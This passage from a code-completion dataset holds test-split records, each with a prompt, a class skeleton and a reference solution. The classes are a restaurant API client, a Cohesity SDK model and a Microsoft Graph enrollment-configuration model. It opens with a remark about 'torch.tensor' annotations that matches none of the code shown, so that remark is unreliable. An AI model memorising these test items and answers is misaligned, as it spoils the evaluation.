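One detail worth noting in the recorded solution: the annotations use `torch.tensor` (the factory function) where the type `torch.Tensor` was presumably intended; annotations are not checked at runtime, so the code still runs as recorded.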
return\ndelete_data = {'timestamp': token, 'data': data}\nres = requests.delete(self.ENDPOINT, json=delete_data)\nif res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)"], "bodies_text": "<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "DatabaseOutputter", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 
'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000355", "length_bytes": 7558, "license_type": "no_license", "methods": [{"docstring": "Retrieve all current restaurants from the API", "name": "get", "signature": "def get(self) -> RestaurantCatalog"}, {"docstring": "Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "insert", "signature": "def insert(self, data: Union[dict, list], token: str) -> None"}, {"docstring": "Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "update", "signature": "def update(self, data: Union[dict, list], token: str) -> None"}, {"docstring": "Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "name": "delete", "signature": "def delete(self, data: Union[dict, list], token: str) -> None"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000618", "prompt": "Implement the Python class `DatabaseOutputter` described below.\n\nClass description:\nImplement the DatabaseOutputter class.\n\nMethod signatures and docstrings:\n- def get(self) -> RestaurantCatalog: Retrieve all current restaurants from the API\n- def insert(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def update(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def delete(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data", "prompted_full_text": "Implement the Python class `DatabaseOutputter` described below.\n\nClass description:\nImplement the DatabaseOutputter class.\n\nMethod signatures and docstrings:\n- def get(self) -> RestaurantCatalog: Retrieve all current restaurants from the API\n- def insert(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as insert to API :param data: a list of 
restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def update(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n- def delete(self, data: Union[dict, list], token: str) -> None: Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\n\n<|skeleton|>\nclass DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "revision_id": "b9d4dd32b4d0dfaa287fd138887a616d962227b7", "skeleton": "<|skeleton|>\nclass DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send 
restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DatabaseOutputter:\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n", "source": "the_stack_v2_python_sparse", "source_path": "filter_xml/data_outputter.py", "source_repo": "sw814f21/filter_xml", "split": "test", "star_events_count": 0} {"blob_id": "ff24bbfbb7575d1124b87f8c015697f566bd3abd", "bodies": 
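Editor's note on the `DatabaseOutputter` record that ends above: each write verb follows a "try the API, fall back to a file" pattern. The sketch below isolates one verb of that pattern; `ENDPOINT`, the payload shape, and the fallback path are assumptions for illustration, not values from the record.

```python
# Hypothetical standalone sketch of the insert-with-fallback pattern above.
import json
import requests

ENDPOINT = "http://localhost:8000/restaurants"  # assumed placeholder

def send_insert(data, token, fallback_path="failed_inserts.json"):
    if len(data) == 0:
        return
    payload = {"timestamp": token, "data": data}
    try:
        res = requests.post(ENDPOINT, json=payload, timeout=4)
        ok = res.status_code == 200
    except requests.exceptions.ConnectionError:
        ok = False
    if not ok:
        # Persist locally so the batch is not silently lost.
        with open(fallback_path, "w") as fh:
            json.dump(payload, fh)
```

Two observations on the recorded code, offered tentatively since the module's imports are not shown: `get()` catches a bare `ConnectionError`, and `requests.exceptions.ConnectionError` is not a subclass of the builtin of that name, so a connection failure would propagate unless `ConnectionError` was imported from `requests.exceptions`. Also, `insert()` names its payload `put_data` while issuing a POST, and `update()` names it `post_data` while issuing a PUT; the names are swapped relative to the verbs, though harmlessly.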
["self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\nself.node_configs = node_configs\nself.vips = vips", "if dictionary is None:\n return None\nchassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\nnode_configs = None\nif dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\nvips = dictionary.get('vips')\nreturn cls(chassis_serial_to_rack_id_map, node_configs, vips)"], "bodies_text": "<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.", "class_name": "ExpandPhysicalClusterParameters", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000356", "length_bytes": 2462, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ExpandPhysicalClusterParameters class", "name": "__init__", "signature": "def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `ExpandPhysicalClusterParameters` described below.\n\nClass description:\nImplementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\n\nMethod signatures and docstrings:\n- def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None): Constructor for the ExpandPhysicalClusterParameters class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ExpandPhysicalClusterParameters` described below.\n\nClass description:\nImplementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\n\nMethod signatures and docstrings:\n- def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None): Constructor for the ExpandPhysicalClusterParameters class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. 
The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. 
vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/expand_physical_cluster_parameters.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "327c271a1e6e32587d0e66bc1c8ab8ebfa9a49a3", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\ntry:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\nexcept AttributeError:\n mapping_value = None\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\nreturn DeviceEnrollmentConfiguration()", "from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\nfrom .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\nfrom .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\nfrom .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\nfrom .entity import Entity\nfrom .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\nfrom .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\nfrom .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\nfrom .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\nfrom .entity import Entity\nfields: Dict[str, Callable[[Any], None]] = 
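Editor's note on the `ExpandPhysicalClusterParameters` record that closes above: `from_dictionary` is the standard recursive-deserialization pattern — plain fields via `dict.get`, typed children rebuilt through their own `from_dictionary`. A generic, self-contained version of the pattern, with stand-in class names of my own:

```python
# Generic sketch of the from_dictionary pattern; Node/Cluster are stand-ins.
class Node:
    def __init__(self, name=None):
        self.name = name

    @classmethod
    def from_dictionary(cls, d):
        if d is None:
            return None
        return cls(name=d.get("name"))

class Cluster:
    def __init__(self, nodes=None, vips=None):
        self.nodes = nodes
        self.vips = vips

    @classmethod
    def from_dictionary(cls, d):
        if d is None:
            return None
        nodes = None
        if d.get("nodes") is not None:  # prefer `is not None` over `!= None`
            nodes = [Node.from_dictionary(x) for x in d.get("nodes")]
        return cls(nodes=nodes, vips=d.get("vips"))

c = Cluster.from_dictionary({"nodes": [{"name": "n1"}], "vips": ["10.0.0.1"]})
assert c.nodes[0].name == "n1" and c.vips == ["10.0.0.1"]
```

The recorded solution compares with `!= None` and builds the list with an explicit loop; both work, but `is not None` and a comprehension are the idiomatic forms. Note also that the record's `from_dictionary(cls, dictionary)` takes `cls` yet shows no `@classmethod` decorator in the skeleton; the decorator is presumably present in the original source and stripped by the skeleton format.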
{'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_collection_of_object_values('assignments', self.assignments)\nwriter.write_datetime_value('createdDateTime', self.created_date_time)\nwriter.write_str_value('description', self.description)\nwriter.write_str_value('displayName', self.display_name)\nwriter.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\nwriter.write_int_value('priority', self.priority)\nwriter.write_int_value('version', self.version)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 
'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "class_docstring": "The Base Class of Device Enrollment Configuration", "class_name": "DeviceEnrollmentConfiguration", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and 